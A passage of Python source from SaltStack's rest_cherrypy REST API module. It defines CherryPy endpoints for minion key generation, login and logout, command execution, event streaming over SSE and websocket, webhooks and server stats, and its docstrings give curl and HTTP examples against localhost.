        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate(token=cherrypy.session.get('token'))

        return {'return': next(result, {}).get('data', {}).get('return', {})}

    @cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
    def POST(self, **kwargs):
        r'''
        Easily generate keys for a minion and auto-accept the new key

        Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>`.

        Example partial kickstart script to bootstrap a new minion:

        .. code-block:: text

            %post
            mkdir -p /etc/salt/pki/minion
            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                | tar -C /etc/salt/pki/minion -xf -

            mkdir -p /etc/salt/minion.d
            printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
            %end

        .. http:post:: /keys

            Generate a public and private key and return both as a tarball

            Authentication credentials must be passed in the request.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                    -o jerry-salt-keys.tar

        .. code-block:: http

            POST /keys HTTP/1.1
            Host: localhost:8000

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 10240
            Content-Disposition: attachment; filename="saltkeys-jerry.tar"
            Content-Type: application/x-tar

            jerry.pub0000644000000000000000000000070300000000000010730 0ustar  00000000000000
        '''
        lowstate = cherrypy.request.lowstate
        lowstate[0].update({
            'client': 'wheel',
            'fun': 'key.gen_accept',
        })

        # The wheel function expects 'id_'; the HTTP API exposes it as 'mid'
        if 'mid' in lowstate[0]:
            lowstate[0]['id_'] = lowstate[0].pop('mid')

        result = self.exec_lowstate()
        ret = next(result, {}).get('data', {}).get('return', {})

        pub_key = ret.get('pub', '')
        pub_key_file = tarfile.TarInfo('minion.pub')
        pub_key_file.size = len(pub_key)

        priv_key = ret.get('priv', '')
        priv_key_file = tarfile.TarInfo('minion.pem')
        priv_key_file.size = len(priv_key)

        fileobj = six.moves.StringIO()
        tarball = tarfile.open(fileobj=fileobj, mode='w')
        tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
        tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
        tarball.close()

        headers = cherrypy.response.headers
        headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
        headers['Content-Type'] = 'application/x-tar'
        # six.moves.StringIO is io.StringIO on Python 3, which has no ``.len``
        # attribute (only py2 cStringIO did); compute the length portably.
        headers['Content-Length'] = len(fileobj.getvalue())
        headers['Cache-Control'] = 'no-cache'

        fileobj.seek(0)
        return fileobj
class Login(LowDataAdapter):
    '''
    Log in to receive a session token

    :ref:`Authentication information <rest_cherrypy-auth>`.
    '''

    def __init__(self, *args, **kwargs):
        super(Login, self).__init__(*args, **kwargs)

        # Resolver performs eauth credential checks without a local minion
        self.auth = salt.auth.Resolver(self.opts)

    def GET(self):
        '''
        Present the login interface

        .. http:get:: /login

            An explanation of how to log in.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/login

        .. code-block:: http

            GET /login HTTP/1.1
            Host: localhost:8000
            Accept: text/html

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: text/html
        '''
        cherrypy.response.headers['WWW-Authenticate'] = 'Session'

        return {
            'status': cherrypy.response.status,
            'return': "Please log in",
        }

    def POST(self, **kwargs):
        '''
        :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system

        .. http:post:: /login

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :form eauth: the eauth backend configured for the user
            :form username: username
            :form password: password

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -si localhost:8000/login \\
                -c ~/cookies.txt \\
                -H "Accept: application/json" \\
                -H "Content-type: application/json" \\
                -d '{
                    "username": "saltuser",
                    "password": "saltuser",
                    "eauth": "auto"
                }'

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Content-Length: 42
            Content-Type: application/json
            Accept: application/json

            {"username": "saltuser", "password": "saltuser", "eauth": "auto"}

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
            Content-Length: 206
            X-Auth-Token: 6d1b722e
            Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/

            {"return": {
                "token": "6d1b722e",
                "start": 1363805943.776223,
                "expire": 1363849143.776224,
                "user": "saltuser",
                "eauth": "pam",
                "perms": [
                    "grains.*",
                    "status.*",
                    "sys.*",
                    "test.*"
                ]
            }}
        '''
        if not self.api._is_master_running():
            raise salt.exceptions.SaltDaemonNotRunning(
                'Salt Master is not available.')

        # the urlencoded_processor will wrap this in a list
        if isinstance(cherrypy.serving.request.lowstate, list):
            creds = cherrypy.serving.request.lowstate[0]
        else:
            creds = cherrypy.serving.request.lowstate

        username = creds.get('username', None)
        # Validate against the whitelist.
        if not salt_api_acl_tool(username, cherrypy.request):
            raise cherrypy.HTTPError(401)

        # Mint token.
        token = self.auth.mk_token(creds)
        if 'token' not in token:
            raise cherrypy.HTTPError(401,
                'Could not authenticate using provided credentials')

        cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
        cherrypy.session['token'] = token['token']
        cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
        cherrypy.session['user'] = token['name']
        if 'groups' in token:
            cherrypy.session['groups'] = token['groups']

        # Grab eauth config for the current backend for the current user
        try:
            eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})

            # Get sum of '*' perms, user-specific perms, and group-specific
            # perms. Copy the user's perm list before extending: extending the
            # list returned by eauth.get() in place would mutate the shared
            # external_auth config, so repeated logins would keep appending
            # '*' and group perms to the stored configuration.
            perms = list(eauth.get(token['name'], []))
            perms.extend(eauth.get('*', []))

            if 'groups' in token and token['groups']:
                user_groups = set(token['groups'])
                eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])

                for group in user_groups & eauth_groups:
                    perms.extend(eauth['{0}%'.format(group)])

            if not perms:
                logger.debug("Eauth permission list not found.")
        except Exception:
            logger.debug("Configuration for external_auth malformed for "
                         "eauth '{0}', and user '{1}'."
                         .format(token.get('eauth'), token.get('name')), exc_info=True)
            perms = None

        return {'return': [{
            'token': cherrypy.session.id,
            'expire': token['expire'],
            'start': token['start'],
            'user': token['name'],
            'eauth': token['eauth'],
            'perms': perms or {},
        }]}
class Logout(LowDataAdapter):
    '''
    Class to remove or invalidate sessions
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
        'tools.lowdata_fmt.on': False,
    })

    def POST(self):
        '''
        Destroy the currently active session and expire the session cookie
        '''
        # Tell the client to drop its cookie, then replace the server-side
        # session with a brand new one so the old id can no longer be used.
        cherrypy.lib.sessions.expire()
        cherrypy.session.regenerate()

        return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
    '''
    Run commands bypassing the :ref:`normal session handling
    <rest_cherrypy-auth>`

    salt-api does not enforce authorization, Salt's eauth system does that.
    Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
    **or** ``token`` kwargs that are then checked by the eauth system. The
    session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
    eauth token and then passes the ``token`` kwarg in automatically.

    If you already have a Salt eauth token, perhaps generated by the
    :py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
    Runner module, then there is no reason to use sessions.

    This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
    **or** a ``token`` kwarg and does not make use of sessions at all.
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.sessions.on': False,
    })

    def POST(self, **kwargs):
        '''
        Run commands bypassing the :ref:`normal session handling
        <rest_cherrypy-auth>` Other than that this URL is identical to the
        :py:meth:`root URL (/) <LowDataAdapter.POST>`.

        .. http:post:: /run

            An array of :term:`lowstate` data describing Salt commands must be
            sent in the request body.

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -H 'Content-type: application/json' \\
                -d '[{
                    "client": "local",
                    "tgt": "*",
                    "fun": "test.ping",
                    "username": "saltdev",
                    "password": "saltdev",
                    "eauth": "auto"
                }]'

        **Or** using a Salt Eauth token:

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -H 'Content-type: application/json' \\
                -d '[{
                    "client": "local",
                    "tgt": "*",
                    "fun": "test.ping",
                    "token": "<salt eauth token here>"
                }]'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/json

            [{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
            - ms-0: true
              ms-1: true
              ms-2: true
              ms-3: true
              ms-4: true

        The /run endpoint can also be used to issue commands using the
        salt-ssh subsystem.

        When using salt-ssh, eauth credentials should not be supplied.
        Instead, authentication should be handled by the SSH layer itself.
        The use of the salt-ssh client does not require a salt master to be
        running. Instead, only a roster file must be present in the salt
        configuration directory.

        All SSH client requests are synchronous.

        **Example SSH client request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='ssh' \\
                -d tgt='*' \\
                -d fun='test.ping'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

            client=ssh&tgt=*&fun=test.ping

        **Example SSH response:**

        .. code-block:: http

            return:
            - silver:
                fun: test.ping
                fun_args: []
                id: silver
                jid: '20141203103525666185'
                retcode: 0
                return: true
                success: true
        '''
        # No session here; eauth credentials (or a token) travel inside the
        # lowstate chunks themselves and are validated by Salt's eauth system.
        results = self.exec_lowstate()
        return {
            'return': list(results),
        }
class Events(object):
    '''
    Expose the Salt event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.resolver = salt.auth.Resolver(self.opts)

    def _is_valid_token(self, auth_token):
        '''
        Check if this is a valid salt-api token or valid Salt token

        salt-api tokens are regular session tokens that tie back to a real Salt
        token. Salt tokens are tokens generated by Salt's eauth system.

        :return bool: True if valid, False if not valid.
        '''
        if auth_token is None:
            return False

        # A salt-api token lives in the session table and maps to a real Salt
        # token; anything not found there is assumed to already be a Salt
        # token.
        orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
        salt_token = orig_session.get('token', auth_token)

        # The eauth system does not currently support perms for the event
        # stream, so existence of the token is the entire check.
        return bool(salt_token and self.resolver.get_token(salt_token))

    def GET(self, token=None, salt_token=None):
        r'''
        An HTTP stream of the Salt master event bus

        This stream is formatted per the Server Sent Events (SSE) spec. Each
        event is formatted as JSON.

        .. http:get:: /events

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :query token: **optional** parameter containing the token
                ordinarily supplied via the X-Auth-Token header in order to
                allow cross-domain requests in browsers that do not include
                CORS support in the EventSource API. E.g.,
                ``curl -NsS localhost:8000/events?token=308650d``
            :query salt_token: **optional** parameter containing a raw Salt
                *eauth token* (not to be confused with the token returned from
                the /login URL). E.g.,
                ``curl -NsS localhost:8000/events?salt_token=30742765``

        **Example request:**

        .. code-block:: bash

            curl -NsS localhost:8000/events

        .. code-block:: http

            GET /events HTTP/1.1
            Host: localhost:8000

        **Example response:**

        Note, the ``tag`` field is not part of the spec. SSE compliant clients
        should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize
        the JSON object each time.

        .. code-block:: http

            HTTP/1.1 200 OK
            Connection: keep-alive
            Cache-Control: no-cache
            Content-Type: text/event-stream;charset=utf-8

            retry: 400
            tag: salt/job/20130802115730568475/new
            data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}

            tag: salt/job/20130802115730568475/ret/jerry
            data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}

        The event stream can be easily consumed via JavaScript:

        .. code-block:: javascript

            var source = new EventSource('/events');
            source.onopen = function() { console.info('Listening ...') };
            source.onerror = function(err) { console.error(err) };
            source.onmessage = function(message) {
                var saltEvent = JSON.parse(message.data);
                console.log(saltEvent.tag, saltEvent.data);
            };

        Note, the SSE stream is fast and completely asynchronous and Salt is
        very fast. If a job is created using a regular POST request, it is
        possible that the job return will be available on the SSE stream before
        the response for the POST request arrives. It is important to take that
        asynchronicity into account when designing an application. Below are
        some general guidelines.

        * Subscribe to the SSE stream _before_ creating any events.
        * Process SSE events directly as they arrive and don't wait for any
          other process to "complete" first (like an ajax request).
        * Keep a buffer of events if the event stream must be used for
          synchronous lookups.
        * Be cautious in writing Salt's event stream directly to the DOM. It is
          very busy and can quickly overwhelm the memory allocated to a
          browser tab.

        A full, working proof-of-concept JavaScript application is available
        :blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
        It can be viewed by pointing a browser at the ``/app`` endpoint in a
        running ``rest_cherrypy`` instance.

        Or using CORS:

        .. code-block:: javascript

            var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});

        It is also possible to consume the stream via the shell.

        Records are separated by blank lines; the ``data:`` and ``tag:``
        prefixes will need to be removed manually before attempting to
        unserialize the JSON.

        curl's ``-N`` flag turns off input buffering which is required to
        process the stream incrementally.

        Here is a basic example of printing each event as it comes in:

        .. code-block:: bash

            curl -NsS localhost:8000/events |\
                    while IFS= read -r line ; do
                        echo $line
                    done

        Here is an example of using awk to filter events based on tag:

        .. code-block:: bash

            curl -NsS localhost:8000/events |\
                    awk '
                        BEGIN { RS=""; FS="\\n" }
                        $1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
                    '
            tag: salt/job/20140112010149808995/new
            data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
            tag: 20140112010149808995
            data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
        '''
        cookies = cherrypy.request.cookie
        auth_token = token or salt_token or (
            cookies['session_id'].value if 'session_id' in cookies else None)

        if not self._is_valid_token(auth_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        for header, value in (('Content-Type', 'text/event-stream'),
                              ('Cache-Control', 'no-cache'),
                              ('Connection', 'keep-alive')):
            cherrypy.response.headers[header] = value

        def event_feed():
            '''
            An iterator to yield Salt events
            '''
            event = salt.utils.event.get_event(
                'master',
                sock_dir=self.opts['sock_dir'],
                transport=self.opts['transport'],
                opts=self.opts,
                listen=True)
            stream = event.iter_events(full=True, auto_reconnect=True)

            # Ask SSE clients to reconnect quickly after a dropped connection
            yield u'retry: {0}\n'.format(400)

            while True:
                data = next(stream)
                yield u'tag: {0}\n'.format(data.get('tag', ''))
                yield u'data: {0}\n\n'.format(json.dumps(data))

        return event_feed()
class WebsocketEndpoint(object):
    '''
    Open a WebSocket connection to Salt's event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure. Uses websocket as the transport mechanism.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
        'tools.websocket.on': True,
        'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
    })

    def __init__(self):
        # Master opts from the cherrypy config; LoadAuth validates raw Salt
        # eauth tokens in GET below.
        self.opts = cherrypy.config['saltopts']
        self.auth = salt.auth.LoadAuth(self.opts)

    def GET(self, token=None, **kwargs):
        '''
        Return a websocket connection of Salt's event stream

        .. http:get:: /ws/(token)

            :query format_events: The event stream will undergo server-side
                formatting if the ``format_events`` URL parameter is included
                in the request. This can be useful to avoid formatting on the
                client-side:

                .. code-block:: bash

                    curl -NsS <...snip...> localhost:8000/ws?format_events

            :reqheader X-Auth-Token: an authentication token from
                :py:class:`~Login`.

            :status 101: switching to the websockets protocol
            :status 401: |401|
            :status 406: |406|

        **Example request:** ::

            curl -NsSk \\
                -H 'X-Auth-Token: ffedf49d' \\
                -H 'Host: localhost:8000' \\
                -H 'Connection: Upgrade' \\
                -H 'Upgrade: websocket' \\
                -H 'Origin: https://localhost:8000' \\
                -H 'Sec-WebSocket-Version: 13' \\
                -H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
                localhost:8000/ws

        .. code-block:: http

            GET /ws HTTP/1.1
            Connection: Upgrade
            Upgrade: websocket
            Host: localhost:8000
            Origin: https://localhost:8000
            Sec-WebSocket-Version: 13
            Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
            X-Auth-Token: ffedf49d

        **Example response**:

        .. code-block:: http

            HTTP/1.1 101 Switching Protocols
            Upgrade: websocket
            Connection: Upgrade
            Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
            Sec-WebSocket-Version: 13

        An authentication token **may optionally** be passed as part of the URL
        for browsers that cannot be configured to send the authentication
        header or cookie:

        .. code-block:: bash

            curl -NsS <...snip...> localhost:8000/ws/ffedf49d

        The event stream can be easily consumed via JavaScript:

        .. code-block:: javascript

            // Note, you must be authenticated!
            var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
            source.onerror = function(e) { console.debug('error!', e); };
            source.onmessage = function(e) { console.debug(e.data); };

            source.send('websocket client ready')

            source.close();

        Or via Python, using the Python module `websocket-client
        <https://pypi.python.org/pypi/websocket-client/>`_ for example.

        .. code-block:: python

            # Note, you must be authenticated!

            from websocket import create_connection

            ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
            ws.send('websocket client ready')

            # Look at https://pypi.python.org/pypi/websocket-client/ for more
            # examples.
            while listening_to_events:
                print ws.recv()

            ws.close()

        Above examples show how to establish a websocket connection to Salt and
        activating real time updates from Salt's event stream by signaling
        ``websocket client ready``.
        '''
        # Pulling the session token from an URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get('token')
        else:
            salt_token = cherrypy.session.get('token')

        # Manually verify the token
        if not salt_token or not self.auth.get_tok(salt_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        # A handler is the server side end of the websocket connection. Each
        # request spawns a new instance of this handler
        handler = cherrypy.request.ws_handler

        def event_stream(handler, pipe):
            '''
            An iterator to return Salt events (and optionally format them)

            Runs in a child process (see Process() below); pushes each event
            to the client through the websocket handler.
            '''
            # blocks until send is called on the parent end of this pipe.
            # This synchronizes with the SynchronizingWebsocket handler so no
            # events are pushed before the client signals it is ready.
            pipe.recv()

            event = salt.utils.event.get_event(
                'master',
                sock_dir=self.opts['sock_dir'],
                transport=self.opts['transport'],
                opts=self.opts,
                listen=True)
            stream = event.iter_events(full=True, auto_reconnect=True)
            SaltInfo = event_processor.SaltInfo(handler)

            # Exit the child process immediately on SIGTERM; registered inside
            # the child so it does not affect the parent server process.
            def signal_handler(signal, frame):
                os._exit(0)

            signal.signal(signal.SIGTERM, signal_handler)

            while True:
                data = next(stream)
                if data:
                    try:  # work around try to decode catch unicode errors
                        if 'format_events' in kwargs:
                            # Server-side formatting was requested via the
                            # format_events URL parameter
                            SaltInfo.process(data, salt_token, self.opts)
                        else:
                            handler.send('data: {0}\n\n'.format(
                                json.dumps(data)), False)
                    except UnicodeDecodeError:
                        logger.error(
                            "Error: Salt event has non UTF-8 data:\n{0}"
                            .format(data))
                time.sleep(0.1)

        parent_pipe, child_pipe = Pipe()
        handler.pipe = parent_pipe
        handler.opts = self.opts
        # Process to handle async push to a client.
        # Each GET request causes a process to be kicked off.
        # NOTE(review): the child process is not joined or terminated here;
        # presumably cleanup happens when the websocket closes -- confirm.
        proc = Process(target=event_stream, args=(handler, child_pipe))
        proc.start()
class Webhook(object):
    '''
    A generic web hook entry point that fires an event on Salt's event bus

    External services can POST data to this URL to trigger an event in Salt.
    For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.

    .. note:: Be mindful of security

        Salt's Reactor can run any code. A Reactor SLS that responds to a hook
        event is responsible for validating that the event came from a trusted
        source and contains valid data.

        **This is a generic interface and securing it is up to you!**

        This URL requires authentication however not all external services can
        be configured to authenticate. For this reason authentication can be
        selectively disabled for this URL. Follow best practices -- always use
        SSL, pass a secret key, configure the firewall to only allow traffic
        from a known source, etc.

    The event data is taken from the request body. The
    :mailheader:`Content-Type` header is respected for the payload.

    The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
    appended to the end. For example, a ``POST`` request sent to
    ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
    ``salt/netapi/hook/mycompany/myapp/mydata``.

    The following is an example ``.travis.yml`` file to send notifications to
    Salt of successful test runs:

    .. code-block:: yaml

        language: python
        script: python -m unittest tests
        after_success:
            - |
                curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
                    -d branch="${TRAVIS_BRANCH}" \
                    -d commit="${TRAVIS_COMMIT}"

    .. seealso:: :ref:`events`, :ref:`reactor`
    '''
    exposed = True
    # Prefix of the event tag for every event fired through this endpoint.
    tag_base = ['salt', 'netapi', 'hook']

    _cp_config = dict(LowDataAdapter._cp_config, **{
        # Don't do any lowdata processing on the POST data
        # NOTE(review): the comment above says lowdata processing should be
        # skipped, yet the flag is True -- confirm against upstream salt;
        # left unchanged here to preserve behavior.
        'tools.lowdata_fmt.on': True,

        # Auth can be overridden in __init__().
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        # Publish-only handle on the master event bus (listen=False).
        self.event = salt.utils.event.get_event(
            'master',
            sock_dir=self.opts['sock_dir'],
            transport=self.opts['transport'],
            opts=self.opts,
            listen=False)

        # Optionally allow unauthenticated access, for external services that
        # cannot be configured to authenticate (see class docstring).
        # NOTE(review): this mutates the class-level _cp_config dict shared by
        # all instances; harmless for the single app instance, but confirm.
        if cherrypy.config['apiopts'].get('webhook_disable_auth'):
            self._cp_config['tools.salt_token.on'] = False
            self._cp_config['tools.salt_auth.on'] = False

    def POST(self, *args, **kwargs):
        '''
        Fire an event in Salt with a custom event tag and data

        .. http:post:: /hook

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :status 413: request body is too large

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/hook \\
                -H 'Content-type: application/json' \\
                -d '{"foo": "Foo!", "bar": "Bar!"}'

        .. code-block:: http

            POST /hook HTTP/1.1
            Host: localhost:8000
            Content-Length: 16
            Content-Type: application/json

            {"foo": "Foo!", "bar": "Bar!"}

        **Example response**:

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 14
            Content-Type: application/json

            {"success": true}

        As a practical example, an internal continuous-integration build
        server could send an HTTP POST request to the URL
        ``https://localhost:8000/hook/mycompany/build/success`` which contains
        the result of a build and the SHA of the version that was built as
        JSON. That would then produce the following event in Salt that could be
        used to kick off a deployment via Salt's Reactor::

            Event fired at Fri Feb 14 17:40:11 2014
            *************************
            Tag: salt/netapi/hook/mycompany/build/success
            Data:
            {'_stamp': '2014-02-14_17:40:11.440996',
            'headers': {
                'X-My-Secret-Key': 'F0fAgoQjIT@W',
                'Content-Length': '37',
                'Content-Type': 'application/json',
                'Host': 'localhost:8000',
                'Remote-Addr': '127.0.0.1'},
            'post': {'revision': 'aa22a3c4b2e7', 'result': True}}

        Salt's Reactor could listen for the event:

        .. code-block:: yaml

            reactor:
              - 'salt/netapi/hook/mycompany/build/*':
                - /srv/reactor/react_ci_builds.sls

        And finally deploy the new build:

        .. code-block:: yaml

            {% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
            {% set build = data.get('post', {}) %}

            {% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
            deploy_my_app:
              cmd.state.sls:
                - tgt: 'application*'
                - arg:
                  - myapp.deploy
                - kwarg:
                    pillar:
                      revision: {{ revision }}
            {% endif %}
        '''
        # Event tag = tag_base + the URL path components after /hook.
        tag = '/'.join(itertools.chain(self.tag_base, args))
        data = cherrypy.serving.request.unserialized_data
        if not data:
            data = {}
        raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
        headers = dict(cherrypy.request.headers)

        # 'ret' reflects whether the event was published, not any consumer
        # outcome.
        ret = self.event.fire_event({
            'body': raw_body,
            'post': data,
            'headers': headers,
        }, tag)
        return {'success': ret}
class Stats(object):
    '''
    Expose statistics on the running CherryPy server
    '''
    exposed = True

    # Require a valid token and auth for this endpoint.
    _cp_config = dict(LowDataAdapter._cp_config,
                      **{'tools.salt_token.on': True,
                         'tools.salt_auth.on': True})

    def GET(self):
        '''
        Return a dump of statistics collected from the CherryPy server

        .. http:get:: /stats

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        '''
        # CherryPy attaches a 'statistics' attribute to the logging module
        # when stats collection is enabled; without it there is nothing to
        # report.
        if not hasattr(logging, 'statistics'):
            return {}

        # Late import
        try:
            from cherrypy.lib import cpstats
        except ImportError:
            logger.error('Import of cherrypy.cpstats failed. Possible '
                         'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
            return {}

        return cpstats.extrapolate_statistics(logging.statistics)
class App(object):
    '''
    Class to serve HTML5 apps
    '''
    exposed = True

    def GET(self, *args):
        '''
        Serve a single static file ignoring the remaining path

        This is useful in combination with a browser-based app using the HTML5
        history API.

        .. http::get:: /app

            :reqheader X-Auth-Token: |req_token|

            :status 200: |200|
            :status 401: |401|
        '''
        # Fall back to the bundled index.html when no 'app' file is
        # configured.
        fallback = os.path.abspath(
            os.path.join(os.path.dirname(__file__), 'index.html'))
        target = cherrypy.config['apiopts'].get('app', fallback)
        return cherrypy.lib.static.serve_file(target)
class API(object):
    '''
    Collect configuration and URL map for building the CherryPy app
    '''
    # Static URL -> handler-class map; extended at runtime by
    # _update_url_map().
    url_map = {
        'index': LowDataAdapter,
        'login': Login,
        'logout': Logout,
        'minions': Minions,
        'run': Run,
        'jobs': Jobs,
        'keys': Keys,
        'events': Events,
        'stats': Stats,
    }

    def _setattr_url_map(self):
        '''
        Set an attribute on the local instance for each key/val in url_map

        CherryPy uses class attributes to resolve URLs.
        '''
        for url, cls in six.iteritems(self.url_map):
            setattr(self, url, cls())

    def _update_url_map(self):
        '''
        Assemble any dynamic or configurable URLs
        '''
        if HAS_WEBSOCKETS:
            self.url_map.update({
                'ws': WebsocketEndpoint,
            })

        # Allow the Webhook URL to be overridden from the conf.
        self.url_map.update({
            self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
        })

        # Enable the single-page JS app URL.
        self.url_map.update({
            self.apiopts.get('app_path', 'app').lstrip('/'): App,
        })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.apiopts = cherrypy.config['apiopts']

        # Finalize the URL map, then materialize one handler instance per URL.
        self._update_url_map()
        self._setattr_url_map()

    def get_conf(self):
        '''
        Combine the CherryPy configuration with the rest_cherrypy config values
        pulled from the master config and return the CherryPy configuration
        '''
        conf = {
            # Server-wide settings, all overridable from the apiopts config.
            'global': {
                'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
                'server.socket_port': self.apiopts.get('port', 8000),
                'server.thread_pool': self.apiopts.get('thread_pool', 100),
                'server.socket_queue_size': self.apiopts.get('queue_size', 30),
                'engine.timeout_monitor.on': self.apiopts.get(
                    'expire_responses', True),
                'max_request_body_size': self.apiopts.get(
                    'max_request_body_size', 1048576),
                'debug': self.apiopts.get('debug', False),
                'log.access_file': self.apiopts.get('log_access_file', ''),
                'log.error_file': self.apiopts.get('log_error_file', ''),
            },
            # Tool toggles applied to every URL in the app.
            '/': {
                'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
                'tools.trailing_slash.on': True,
                'tools.gzip.on': True,
                'tools.cpstats.on': self.apiopts.get('collect_stats', False),
                'tools.html_override.on': True,
                'tools.cors_tool.on': True,
            },
        }

        if 'favicon' in self.apiopts:
